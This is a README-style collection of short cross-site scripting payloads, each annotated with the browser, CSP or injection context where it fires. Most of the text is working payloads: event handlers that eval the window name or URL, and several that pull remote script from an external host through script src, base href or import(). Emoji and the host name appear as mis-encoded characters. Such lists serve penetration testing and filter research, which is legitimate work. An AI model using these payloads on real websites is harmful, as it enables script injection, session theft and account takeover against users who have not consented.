This is a curated set of small but powerful Cross-Site Scripting (XSS) payloads π₯ designed to exploit vulnerabilities in different web application contexts. These payloads can be used to test and identify weak points in web security π. A collection of short XSS payloads that can be used in different contexts.
The DEMO available here: https://tiny-xss-payloads.netlify.app/ π Why Tiny Payloads?
β‘ Lightweight: Easily bypass filters due to their minimal size.
π― Targeted: Crafted for specific scenarios (e.g., HTML, JavaScript, URLs).
π‘οΈ Efficient Testing: Quick checks for XSS vulnerabilities.
π Bug Hunting: Identify weak points in websites.
π§ͺ Penetration Testing: Test how applications handle untrusted input.
π οΈ Security Auditing: Assess web application resilience.
<!-- Requires a relative script inserted to the DOM after the sink,
e.g. <base/href=//Η.β¨> ... <script src=/aaa></script> -->
<base/href=//Η.β¨><!-- Only works as reflected XSS -->
<svg/onload=eval(name)><!-- If you control the URL -->
<svg/onload=eval(`'`+URL)><!-- If you control the name, but unsafe-eval not enabled -->
<svg/onload=location=name><!-- In chrome, also works inside innerHTML, even on elements not yet inserted into DOM -->
<svg><svg/onload=eval(name)><!-- If you control window's name, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<audio/src/onerror=eval(name)><!-- If you control the URL, this payload will work inside innerHTML, even on elements not yet inserted into the DOM -->
<img/src/onerror=eval(`'`+URL)><!-- Just a casual script -->
<script/src=//Η.β¨></script><!-- If you control the name of the window -->
<iframe/onload=src=top.name><!-- If you control the URL -->
<iframe/onload=eval(`'`+URL)><!-- If number of iframes on the page is constant -->
<iframe/onload=src=top[0].name+/\Η.β¨?/><!-- for Firefox only -->
<iframe/srcdoc="<svg><script/href=//Η.β¨ />"><!-- If number of iframes on the page is random -->
<iframe/onload=src=contentWindow.name+/\Η.β¨?/><!-- If unsafe-inline is disabled in CSP and external scripts allowed -->
<iframe/srcdoc="<script/src=//Η.β¨></script>"><!-- If inline styles are allowed -->
<style/onload=eval(name)><!-- If inline styles are allowed and the URL can be controlled -->
<style/onload=eval(`'`+URL)><!-- If inline styles are blocked -->
<style/onerror=eval(name)><!-- Uses external script as import, doesn't work in innerHTML -->
<!-- The PoC only works on https and Chrome, because Η.β¨ checks for Sec-Fetch-Dest header -->
<svg/onload=import(/\\Η.β¨/)><!-- Uses external script as import, triggers if inline styles are allowed.
<!-- The PoC only works on https and Chrome, because Η.β¨ checks for Sec-Fetch-Dest header -->
<style/onload=import(/\\Η.β¨/)><!-- Uses external script as import -->
<!-- The PoC only works on https and Chrome, because Η.β¨ checks for Sec-Fetch-Dest header -->
<iframe/onload=import(/\\Η.β¨/)>Deprecated:
<!-- If you control the URL, Safari-only -->
<iframe/onload=write(URL)><!-- If inline styles are allowed, Safari only -->
<style/onload=write(URL)>These payloads are for educational and ethical testing purposes only. Unauthorized use is illegal and unethical. Always have proper authorization before testing! β
Authorβ€οΈ: UTTAM BODARA
Licenseπ: MIT License